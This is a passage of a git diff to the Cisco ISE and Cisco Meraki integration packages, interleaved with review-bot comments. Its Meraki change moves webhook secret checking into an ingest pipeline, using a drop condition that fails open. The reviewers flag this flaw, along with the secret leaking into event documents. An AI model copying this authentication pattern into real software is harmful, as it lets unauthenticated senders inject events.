a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-diagnostics.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-diagnostics.log-expected.json @@ -2930,7 +2930,7 @@ } }, { - "@timestamp": "2023-03-02T10:54:40.000Z", + "@timestamp": "2024-03-02T10:54:40.000Z", "cisco_ise": { "log": { "calling_station": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-system-statistics.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-system-statistics.log-expected.json index 55711e49fdc..dc0f7330434 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-system-statistics.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-system-statistics.log-expected.json 
@@ -450,7 +450,7 @@ ] }, { - "@timestamp": "2023-03-10T09:11:50.000Z", + "@timestamp": "2024-03-10T09:11:50.000Z", "cisco_ise": { "log": { "active_session": { @@ -528,7 +528,7 @@ ] }, { - "@timestamp": "2023-03-16T02:34:02.000Z", + "@timestamp": "2024-03-16T02:34:02.000Z", "cisco_ise": { "log": { "active_session": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-tacacs-accounting.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-tacacs-accounting.log-expected.json index c35aed77703..09bd7bda11b 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-tacacs-accounting.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-tacacs-accounting.log-expected.json @@ -483,7 +483,7 @@ } }, { - "@timestamp": "2023-02-21T19:13:08.000Z", + "@timestamp": "2024-02-21T19:13:08.000Z", "cisco_ise": { "log": { "acct": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-threat-centric-nac.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-threat-centric-nac.log-expected.json index b8c9926d458..70ec7002a63 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-threat-centric-nac.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-threat-centric-nac.log-expected.json @@ -194,7 +194,7 @@ ] }, { - "@timestamp": "2023-03-03T00:02:46.000Z", + "@timestamp": "2024-03-03T00:02:46.000Z", "cisco_ise": { "log": { "category": { diff --git a/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 5c76551fa11..d746364600c 100644 --- a/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/default.yml 
@@ -13,8 +13,8 @@ processors:
 field: event.original
 tag: grok_time_details
 patterns:
- - '^<%{NUMBER:log.syslog.priority:long}>%{SYSLOGTIMESTAMP:_tmp.timestamp} %{ISO8601_TIMEZONE:_tmp.timezone} %{DATA:host.hostname} %{DATA:cisco_ise.log.category.name} %{GREEDYDATA:_tmp.message}$'
- - '^<%{NUMBER:log.syslog.priority:long}>%{SYSLOGTIMESTAMP:_tmp.timestamp} %{DATA:host.hostname} %{DATA:cisco_ise.log.category.name} %{GREEDYDATA:_tmp.message}$'
+ - '^(?:<%{NUMBER:log.syslog.priority:long}>)?%{SYSLOGTIMESTAMP:_tmp.timestamp} %{ISO8601_TIMEZONE:_tmp.timezone} %{DATA:host.hostname} %{DATA:cisco_ise.log.category.name} %{GREEDYDATA:_tmp.message}$'
+ - '^(?:<%{NUMBER:log.syslog.priority:long}>)?%{SYSLOGTIMESTAMP:_tmp.timestamp} %{DATA:host.hostname} %{DATA:cisco_ise.log.category.name} %{GREEDYDATA:_tmp.message}$'
 - '^%{DATA:cisco_ise.log.category.name} %{DATA:cisco_ise.log.message.id} %{NONNEGINT:cisco_ise.log.segment.total:long} %{NONNEGINT:cisco_ise.log.segment.number:long} %{GREEDYDATA:message}$'
 on_failure:
 - append:
diff --git a/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/pipeline_administrative_and_operational_audit.yml b/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/pipeline_administrative_and_operational_audit.yml
index f547aeeefbe..81f2c6feaa5 100644
--- a/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/pipeline_administrative_and_operational_audit.yml
+++ b/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/pipeline_administrative_and_operational_audit.yml
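Review bot: The two rewritten patterns make the `<PRI>` prefix optional but leave no record of why, and the consequence is that `log.syslog.priority` is now absent for unframed messages, so anything downstream that derives facility or severity from it (not in this hunk) silently skips those events; the my-devices fixture shows `log.level` for them coming only from the `INFO`/`ERROR` token inside the message, and the fourth event getting no `log` object at all. A comment on the processor would keep that visible, e.g. `# The syslog <PRI> header is optional: ISE messages relayed without syslog framing (see test-pipeline-my-devices.log) still carry the timestamp and category name; without it log.syslog.priority stays unset.` The grok processor's `on_failure` block continues past the end of the hunk.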
@@ -175,7 +175,7 @@ processors:
 - append:
 field: event.category
 value: iam
- if: ctx.cisco_ise?.log?.message?.code != null && ['51001','51002','51020','51021','52000','52001','52002','60077','60078','60461','61077','60077','58005','60094','60093','60134','60188','60116','60080','60115','60081'].contains(ctx.cisco_ise.log.message.code)
+ if: ctx.cisco_ise?.log?.message?.code != null && ['51001','51002','51020','51021','52000','52001','52002','60077','60078','60461','61077','58005','60094','60093','60134','60188','60116','60080','60115','60081'].contains(ctx.cisco_ise.log.message.code)
 ignore_failure: true
 - append:
 field: event.category
@@ -235,7 +235,7 @@ processors:
 - append:
 field: event.type
 value: info
- if: ctx.cisco_ise?.log?.message?.code != null && ['51001','51002','51020','51021','52000','52001','52002','60067','60070','60077','60078','60456','60461','61025','61026','61077','60077','58005','60094','60093','60134','60188','60116','60080','60115','60081'].contains(ctx.cisco_ise.log.message.code)
+ if: ctx.cisco_ise?.log?.message?.code != null && ['51001','51002','51020','51021','52000','52001','52002','60067','60070','60077','60078','60456','60461','61025','61026','61077','58005','60094','60093','60134','60188','60116','60080','60115','60081'].contains(ctx.cisco_ise.log.message.code)
 ignore_failure: true
 - append:
 field: event.type
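Review bot: The message-code list in this `if:` condition is the same list kept by hand in the `event.type` condition of the next hunk and again in `categoryReferenceTable` inside the script processor (the `@@ -249` and `@@ -263` hunks), which is why the stray `'60077'` had to be removed in four places; nothing ties the copies together, so the next edit can let them drift apart. Either derive the `append` conditions from the table the script already holds, or add a comment at each copy such as `# Keep this code list in sync with categoryReferenceTable in the script processor below and with the event.type condition.` The duplicate `'60077'` was harmless to `contains()`, so the change is cosmetic; the enclosing `processors:` list begins and ends outside the hunk.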
@@ -249,8 +249,8 @@ processors:
 def eventCategory = new ArrayList();
 def eventType = new ArrayList();
 def categoryReferenceTable = [
- ["messageCodeArray": ["51001","51002","51020","51021","52000","52001","52002","60077","60078","60461","61077","60077","58005","60094","60093","60134","60188","60116","60080","60115","60081"], "name": "iam"],
- ["messageCodeArray": ["51001","51002","51020","51021","60077","60078","61077", "60077","60188","60116","60080","60115","60081"], "name": "authentication"],
+ ["messageCodeArray": ["51001","51002","51020","51021","52000","52001","52002","60077","60078","60461","61077","58005","60094","60093","60134","60188","60116","60080","60115","60081"], "name": "iam"],
+ ["messageCodeArray": ["51001","51002","51020","51021","60077","60078","61077","60188","60116","60080","60115","60081"], "name": "authentication"],
 ["messageCodeArray": ["61025","61026","60134"], "name": "network"],
 ["messageCodeArray": ["60067","60070","60456","58005"], "name": "process"],
 ["messageCodeArray": ["52000","52001","52002"], "name": "configuration"]
@@ -263,7 +263,7 @@ processors:
 ["messageCodeArray": ["52002"], "name": "deletion"],
 ["messageCodeArray": ["61026"], "name": "end"],
 ["messageCodeArray": ["60116","60080","60115","60081"], "name": "user"],
- ["messageCodeArray": ["51001","51002","51020","51021","52000","52001","52002","60067","60070","60077","60078","60456","60461","61025","61026","61077","60077","58005","60094","60093","60134","60188","60116","60080","60115","60081"], "name": "info"],
+ ["messageCodeArray": ["51001","51002","51020","51021","52000","52001","52002","60067","60070","60077","60078","60456","60461","61025","61026","61077","58005","60094","60093","60134","60188","60116","60080","60115","60081"], "name": "info"],
 ["messageCodeArray": ["60067","60456","61025"], "name": "start"]
 ];
diff --git a/packages/cisco_ise/manifest.yml b/packages/cisco_ise/manifest.yml
index 7243aea3627..ec951dc4ecb 100644
--- a/packages/cisco_ise/manifest.yml
+++ b/packages/cisco_ise/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.3"
 name: cisco_ise
 title: Cisco ISE
-version: "1.21.3"
+version: "1.22.1"
 description: Collect logs from Cisco ISE with Elastic Agent.
 type: integration
 categories:
diff --git a/packages/cisco_meraki/_dev/deploy/docker/docker-compose.yml b/packages/cisco_meraki/_dev/deploy/docker/docker-compose.yml
index 7714b740861..9886cc233b4 100644
--- a/packages/cisco_meraki/_dev/deploy/docker/docker-compose.yml
+++ b/packages/cisco_meraki/_dev/deploy/docker/docker-compose.yml
@@ -7,7 +7,6 @@ services:
 environment:
 - STREAM_PROTOCOL=webhook
 - STREAM_ADDR=http://elastic-agent:8686/meraki/events
- - STREAM_WEBHOOK_HEADER=Authorization=abc123
 command: log --start-signal=SIGHUP --delay=5s /sample_events/meraki-mx-ndjson.log
 meraki-webhook-https:
 image: docker.elastic.co/observability/stream:v0.6.2
@@ -16,7 +15,6 @@ services:
 environment:
 - STREAM_PROTOCOL=webhook
 - STREAM_ADDR=https://elastic-agent:8686/meraki/events
- - STREAM_WEBHOOK_HEADER=Authorization=abc123
 - STREAM_INSECURE=true
 command: log --start-signal=SIGHUP --delay=5s /sample_events/meraki-mx-ndjson.log
 cisco_meraki-log-logfile:
diff --git a/packages/cisco_meraki/_dev/deploy/docker/sample_events/meraki-mx-ndjson.log b/packages/cisco_meraki/_dev/deploy/docker/sample_events/meraki-mx-ndjson.log
index efed345fcab..42e9cbee130 100644
--- a/packages/cisco_meraki/_dev/deploy/docker/sample_events/meraki-mx-ndjson.log
+++ b/packages/cisco_meraki/_dev/deploy/docker/sample_events/meraki-mx-ndjson.log
@@ -1,2 +1,3 @@ -{ "version": "0.1", "sharedSecret": "secret", "sentAt": "2021-10-07T08:42:00.926325Z", "organizationId": "2930418", "organizationName": "My organization", "organizationUrl": "https://dashboard.meraki.com/o/VjjsAd/manage/organization/overview", "networkId": "N_24329156", "networkName": "Main Office", "networkUrl": "https://n1.meraki.com//n//manage/nodes/list", "networkTags": [], "deviceSerial": "Q234-ABCD-5678", "deviceMac": "00:11:22:33:44:55", "deviceName": "My appliance", "deviceUrl": "https://n1.meraki.com//n//manage/nodes/new_list/000000000000", "deviceTags": [ "tag1", "tag2" ], "deviceModel": "MX", "alertId": "0000000000000000", "alertType": "Cellular came up", "alertTypeId": "cellular_up", "alertLevel": "informational", "occurredAt": "2018-02-11T00:00:00.123450Z", "alertData": { "provider": "Purview Wireless", "model": "UML290VW", "local": "192.168.1.2", "remote": "1.2.3.5", "connection": "LTE" } } -{ "version": "0.1", "sharedSecret": "secret", "sentAt": "2021-10-07T08:42:00.927486Z", "organizationId": "2930418", "organizationName": "My organization", "organizationUrl": "https://dashboard.meraki.com/o/VjjsAd/manage/organization/overview", "networkId": "N_24329156", "networkName": "Main Office", "networkUrl": "https://n1.meraki.com//n//manage/nodes/list", "networkTags": [], "deviceSerial": "Q234-ABCD-5678", "deviceMac": "00:11:22:33:44:55", "deviceName": "", "deviceUrl": "https://n1.meraki.com//n//manage/nodes/new_list/000000000000", "deviceTags": [ "tag1", "tag2" ], "deviceModel": "", "alertId": "0000000000000000", "alertType": "Insight Alert", "alertTypeId": "mi_alert", "alertLevel": "warning", "occurredAt": "2018-02-11T00:00:00.123450Z", "alertData": {} } +{ "version": "0.1", "sharedSecret": "abc123", "sentAt": "2021-10-07T08:42:00.926325Z", "organizationId": "2930418", "organizationName": "My organization", "organizationUrl": "https://dashboard.meraki.com/o/VjjsAd/manage/organization/overview", "networkId": "N_24329156", "networkName": 
"Main Office", "networkUrl": "https://n1.meraki.com//n//manage/nodes/list", "networkTags": [], "deviceSerial": "Q234-ABCD-5678", "deviceMac": "00:11:22:33:44:55", "deviceName": "My appliance", "deviceUrl": "https://n1.meraki.com//n//manage/nodes/new_list/000000000000", "deviceTags": [ "tag1", "tag2" ], "deviceModel": "MX", "alertId": "0000000000000000", "alertType": "Cellular came up", "alertTypeId": "cellular_up", "alertLevel": "informational", "occurredAt": "2018-02-11T00:00:00.123450Z", "alertData": { "provider": "Purview Wireless", "model": "UML290VW", "local": "192.168.1.2", "remote": "1.2.3.5", "connection": "LTE" } } +{ "version": "0.1", "sharedSecret": "abc123", "sentAt": "2021-10-07T08:42:00.927486Z", "organizationId": "2930418", "organizationName": "My organization", "organizationUrl": "https://dashboard.meraki.com/o/VjjsAd/manage/organization/overview", "networkId": "N_24329156", "networkName": "Main Office", "networkUrl": "https://n1.meraki.com//n//manage/nodes/list", "networkTags": [], "deviceSerial": "Q234-ABCD-5678", "deviceMac": "00:11:22:33:44:55", "deviceName": "", "deviceUrl": "https://n1.meraki.com//n//manage/nodes/new_list/000000000000", "deviceTags": [ "tag1", "tag2" ], "deviceModel": "", "alertId": "0000000000000000", "alertType": "Insight Alert", "alertTypeId": "mi_alert", "alertLevel": "warning", "occurredAt": "2018-02-11T00:00:00.123450Z", "alertData": {} } +{ "version": "0.1", "sharedSecret": "wrongsecret", "sentAt": "2021-10-09T08:42:00.926325Z", "organizationId": "2930418", "organizationName": "My organization", "organizationUrl": "https://dashboard.meraki.com/o/VjjsAd/manage/organization/overview", "networkId": "N_24329156", "networkName": "Main Office", "networkUrl": "https://n1.meraki.com//n//manage/nodes/list", "networkTags": [], "deviceSerial": "Q234-ABCD-5678", "deviceMac": "00:11:22:33:44:55", "deviceName": "My appliance", "deviceUrl": "https://n1.meraki.com//n//manage/nodes/new_list/000000000000", "deviceTags": [ "tag1", "tag2" 
], "deviceModel": "MX", "alertId": "0000000000000000", "alertType": "Cellular came up", "alertTypeId": "cellular_up", "alertLevel": "informational", "occurredAt": "2018-02-11T00:00:00.123450Z", "alertData": { "provider": "Purview Wireless", "model": "UML290VW", "local": "192.168.1.2", "remote": "1.2.3.5", "connection": "LTE" } } diff --git a/packages/cisco_meraki/changelog.yml b/packages/cisco_meraki/changelog.yml index 49b4dfd4aef..1d4bbd4c310 100644 --- a/packages/cisco_meraki/changelog.yml +++ b/packages/cisco_meraki/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.21.2" + changes: + - description: Fix webhook shared secret configuration and behavior. + type: bugfix + link: https://github.com/elastic/integrations/pull/9415 +- version: "1.21.1" + changes: + - description: Fix url processing. + type: bugfix + link: https://github.com/elastic/integrations/pull/9310 +- version: "1.21.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.20.3" changes: - description: Changed owners diff --git a/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-common-config.yml b/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..1397ab41fa1 --- /dev/null +++ b/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + _conf: + secret: secret diff --git a/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json b/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json index 9c0907b47e0..e02ee2d7160 100644 --- a/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json +++ b/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json 
@@ -100,6 +100,43 @@ "ifUp": "1" } } + }, + { + "json": { + "version": "0.1", + "sharedSecret": "wrong_secret", + "sentAt": "2021-10-07T08:42:00.937240Z", + "organizationId": "2930418", + "organizationName": "My organization", + "organizationUrl": "https://dashboard.meraki.com/o/VjjsAd/manage/organization/overview", + "networkId": "N_24329156", + "networkName": "Main Office", + "networkUrl": "https://n1.meraki.com//n//manage/nodes/list", + "networkTags": [], + "deviceSerial": "Q234-ABCD-5678", + "deviceMac": "00:11:22:33:44:55", + "deviceName": "My switch", + "deviceUrl": "https://n1.meraki.com//n//manage/nodes/new_list/000000000000", + "deviceTags": [ + "tag1", + "tag2" + ], + "deviceModel": "MS", + "alertId": "0000000000000000", + "alertType": "Failover event detected", + "alertTypeId": "vrrp", + "alertLevel": "critical", + "occurredAt": "2018-02-11T00:00:00.123450Z", + "alertData": { + "oldIfUp": "0", + "oldMode": "detect", + "oldPrio": "75", + "electorState": "master", + "mode": "detect", + "prio": "75", + "ifUp": "1" + } + } } ] } \ No newline at end of file diff --git a/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json-expected.json b/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json-expected.json index 39bf59e6c34..fac58ef26fb 100644 --- a/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json-expected.json +++ b/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json-expected.json @@ -169,6 +169,7 @@ "id": "2930418", "name": "My organization" } - } + }, + null ] } \ No newline at end of file diff --git a/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-http-config.yml b/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-http-config.yml index 8d1477c15e5..78f38d6c822 100644 --- a/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-http-config.yml 
+++ b/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-http-config.yml @@ -9,3 +9,5 @@ data_stream: url: /meraki/events secret_value: abc123 preserve_original_event: true +assert: + hit_count: 2 diff --git a/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-https-config.yml b/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-https-config.yml index 1bec59a6396..062f0400af8 100644 --- a/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-https-config.yml +++ b/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-https-config.yml @@ -60,3 +60,5 @@ data_stream: Iqi7is4z2mP8pbcIIlmloogE -----END PRIVATE KEY----- verification_mode: none +assert: + hit_count: 2 \ No newline at end of file diff --git a/packages/cisco_meraki/data_stream/events/agent/stream/http_endpoint.yml.hbs b/packages/cisco_meraki/data_stream/events/agent/stream/http_endpoint.yml.hbs index 1203728f145..e0d65604e3e 100644 --- a/packages/cisco_meraki/data_stream/events/agent/stream/http_endpoint.yml.hbs +++ b/packages/cisco_meraki/data_stream/events/agent/stream/http_endpoint.yml.hbs @@ -13,8 +13,10 @@ url: {{url}} {{/if}} {{#if secret_value}} -secret.header: Authorization -secret.value: "{{secret_value}}" +fields_under_root: true +fields: + _conf: + secret: "{{secret_value}}" {{/if}} {{#if ssl}} diff --git a/packages/cisco_meraki/data_stream/events/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_meraki/data_stream/events/elasticsearch/ingest_pipeline/default.yml index 9dcc7e2fc32..79bf9a4ce3b 100644 --- a/packages/cisco_meraki/data_stream/events/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_meraki/data_stream/events/elasticsearch/ingest_pipeline/default.yml 
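Review bot: Placing the shared secret in `fields._conf.secret` under `fields_under_root: true` copies the secret into every event document as a top-level field, and its removal now depends on the ingest pipeline's final `remove` processor actually running; if an earlier processor fails into an `on_failure` branch that does not also strip `_conf`, the document can be indexed with the secret intact. A comment here, `# _conf.secret is compared against json.sharedSecret in the ingest pipeline and removed there; it must never reach the index`, and a matching `remove` of `_conf` on the pipeline's failure path would close that gap. Also note that the removed `secret.header`/`secret.value` settings made the http_endpoint input reject unauthenticated requests before accepting the body, whereas with this change the listener accepts every request and the secret is only checked after the event is in the pipeline, so the sender is no longer authenticated at the transport level.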
@@ -1,6 +1,8 @@ --- description: Pipeline for processing Cisco Meraki events processors: +- drop: + if: ctx.json?.sharedSecret != null && ctx.json.sharedSecret != '' && ctx._conf?.secret != ctx.json.sharedSecret - set: field: ecs.version value: '8.11.0' @@ -15,7 +17,7 @@ processors: - append: field: observer.mac value: '{{{_tmp.observer.mac}}}' - if: ctx?._tmp?.observer?.mac != null + if: ctx._tmp?.observer?.mac != null - set: field: observer.name copy_from: json.deviceName @@ -267,10 +269,11 @@ processors: - cisco_meraki.event.alertType - cisco_meraki.event.alertLevel - _tmp + - _conf ignore_missing: true - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" ignore_failure: true ignore_missing: true - script: diff --git a/packages/cisco_meraki/data_stream/events/manifest.yml b/packages/cisco_meraki/data_stream/events/manifest.yml index 6a15a465045..9d1aea4f7c3 100644 --- a/packages/cisco_meraki/data_stream/events/manifest.yml +++ b/packages/cisco_meraki/data_stream/events/manifest.yml @@ -31,11 +31,12 @@ streams: show_user: false default: /meraki/events - name: secret_value - type: text - description: Authorization token + type: password + description: Shared secret used for selecting events that can be ingested. multi: false required: false show_user: true + secret: true - name: ssl type: yaml title: TLS diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log index 56be8864bea..a62fadbd6eb 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log +++ b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log 
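Review bot: The new `drop` condition fails open: it drops only when the event carries a non-empty `json.sharedSecret` that differs from the configured value, so a payload that omits `sharedSecret` (or sends an empty string) is ingested even when a secret is configured. The check should be driven by the configured side instead, e.g. `if: ctx._conf?.secret != null && ctx._conf.secret != '' && ctx.json?.sharedSecret != ctx._conf.secret`, which keeps the no-secret-configured case permissive and rejects anything that does not present the matching value. Pipeline test fixtures for this data stream that carry no `sharedSecret` would then need to include the `secret` value from `test-common-config.yml`, which is presumably why the inverted form was chosen. A short comment on the processor stating that the secret is compared here rather than at the HTTP listener, and that the `_conf` field is removed further down, would help the next maintainer understand the flow.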
@@ -1,3 +1,4 @@ <134>1 1647479503.348215340 MX84 urls src=10.0.1.29:60336 dst=89.160.20.156:80 mac=78:7B:8A:CC:05:18 request: UNKNOWN https://bitbucket.org/... <134>1 1647479503.676404537 MX84 urls src=10.0.0.234:56424 dst=89.160.20.112:443 mac=64:1C:AE:68:2A:01 request: GET https://lh3.googleusercontent.com/p/AFVnnY=w2048-h1024 <134>1 1647479503.676404537 MX84 urls src=10.0.0.234:56424 dst=89.160.20.112:443 mac=64:1C:AE:68:2A:01 agent='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0' request: GET https://lh3.googleusercontent.com/p/AFVnnY=w2048-h1024 +<134>1 1709836794.196198735 BOS_WAP2_Service urls src=10.0.1.29:60336 dst=89.160.20.112:443 mac=64:1C:AE:68:2A:01 agent='Microsoft NCSI' request: GET http://www.msftconnecttest.com/connecttest.txt diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log-expected.json b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log-expected.json index 4172aac2ad2..0805b8cc605 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log-expected.json +++ b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log-expected.json @@ -63,7 +63,12 @@ "preserve_original_event" ], "url": { - "original": "https://bitbucket.org/..." + "domain": "bitbucket.org", + "original": "https://bitbucket.org/...", + "path": "/...", + "registered_domain": "bitbucket.org", + "scheme": "https", + "top_level_domain": "org" } }, { @@ -129,7 +134,13 @@ "preserve_original_event" ], "url": { - "original": "https://lh3.googleusercontent.com/p/AFVnnY=w2048-h1024" + "domain": "lh3.googleusercontent.com", + "original": "https://lh3.googleusercontent.com/p/AFVnnY=w2048-h1024", + "path": "/p/AFVnnY=w2048-h1024", + "registered_domain": "googleusercontent.com", + "scheme": "https", + "subdomain": "lh3", + "top_level_domain": "com" } }, { 
@@ -195,7 +206,13 @@ "preserve_original_event" ], "url": { - "original": "https://lh3.googleusercontent.com/p/AFVnnY=w2048-h1024" + "domain": "lh3.googleusercontent.com", + "original": "https://lh3.googleusercontent.com/p/AFVnnY=w2048-h1024", + "path": "/p/AFVnnY=w2048-h1024", + "registered_domain": "googleusercontent.com", + "scheme": "https", + "subdomain": "lh3", + "top_level_domain": "com" }, "user_agent": { "device": { 
@@ -210,6 +227,86 @@ }, "version": "108.0." } + }, + { + "@timestamp": "2024-03-07T18:39:54.196Z", + "cisco_meraki": { + "event_subtype": "http_access", + "event_type": "urls", + "urls": { + "mac": "64-1C-AE-68-2A-01" + } + }, + "destination": { + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.112", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "http-access", + "category": [ + "network", + "web" + ], + "original": "<134>1 1709836794.196198735 BOS_WAP2_Service urls src=10.0.1.29:60336 dst=89.160.20.112:443 mac=64:1C:AE:68:2A:01 agent='Microsoft NCSI' request: GET http://www.msftconnecttest.com/connecttest.txt", + "type": [ + "info", + "access" + ] + }, + "http": { + "request": { + "method": "GET" + } + }, + "observer": { + "hostname": "BOS_WAP2_Service" + }, + "source": { + "ip": "10.0.1.29", + "port": 60336 + }, + "tags": [ + "forwarded", + "preserve_original_event" + ], + "url": { + "domain": "www.msftconnecttest.com", + "extension": "txt", + "original": "http://www.msftconnecttest.com/connecttest.txt", + "path": "/connecttest.txt", + "registered_domain": "msftconnecttest.com", + "scheme": "http", + "subdomain": "www", + "top_level_domain": "com" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "'Microsoft NCSI'" + } } ] } \ No newline at end of file diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/cisco_meraki/data_stream/log/_dev/test/system/test-logfile-config.yml index 075ff2cfb2c..0d8dcb81f8c 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/system/test-logfile-config.yml 
+++ b/packages/cisco_meraki/data_stream/log/_dev/test/system/test-logfile-config.yml @@ -5,3 +5,5 @@ data_stream: paths: - "{{SERVICE_LOGS_DIR}}/cisco-meraki*.log" preserve_original_event: true +assert: + hit_count: 204 diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/cisco_meraki/data_stream/log/_dev/test/system/test-tcp-config.yml index 1a0939ace90..f85ea451cf6 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/system/test-tcp-config.yml +++ b/packages/cisco_meraki/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -6,3 +6,5 @@ data_stream: listen_address: 0.0.0.0 listen_port: 8685 preserve_original_event: true +assert: + hit_count: 204 diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/cisco_meraki/data_stream/log/_dev/test/system/test-udp-config.yml index 5699b412d51..e7918a6aa12 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/system/test-udp-config.yml +++ b/packages/cisco_meraki/data_stream/log/_dev/test/system/test-udp-config.yml @@ -6,3 +6,8 @@ data_stream: listen_address: 0.0.0.0 listen_port: 8685 preserve_original_event: true +# Do not assert hit count for this input. Locally, the constraint is +# satisfied, but on CI, apparently the UDP input drops too many (>0) +# messages. +# assert: +# hit_count: 204 \ No newline at end of file diff --git a/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/urls.yml b/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/urls.yml index 6238d122ade..f284cc5a6bd 100644 --- a/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/urls.yml +++ b/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/urls.yml 
@@ -73,6 +73,15 @@ processors: - user_agent: field: user_agent.original ignore_missing: true +# url processing +- uri_parts: + field: url.original + target_field: url + if: ctx.url?.original != null && ctx.url.original != "" +- registered_domain: + field: url.domain + target_field: url + ignore_missing: true on_failure: - set: field: event.kind diff --git a/packages/cisco_meraki/data_stream/log/fields/ecs.yml b/packages/cisco_meraki/data_stream/log/fields/ecs.yml index 37c048e439f..c44c63e7226 100644 --- a/packages/cisco_meraki/data_stream/log/fields/ecs.yml +++ b/packages/cisco_meraki/data_stream/log/fields/ecs.yml @@ -236,6 +236,8 @@ name: url.registered_domain - external: ecs name: url.scheme +- external: ecs + name: url.subdomain - external: ecs name: url.top_level_domain - external: ecs diff --git a/packages/cisco_meraki/docs/README.md b/packages/cisco_meraki/docs/README.md index 9c1fc2c54fd..3cf417cf830 100644 --- a/packages/cisco_meraki/docs/README.md +++ b/packages/cisco_meraki/docs/README.md 
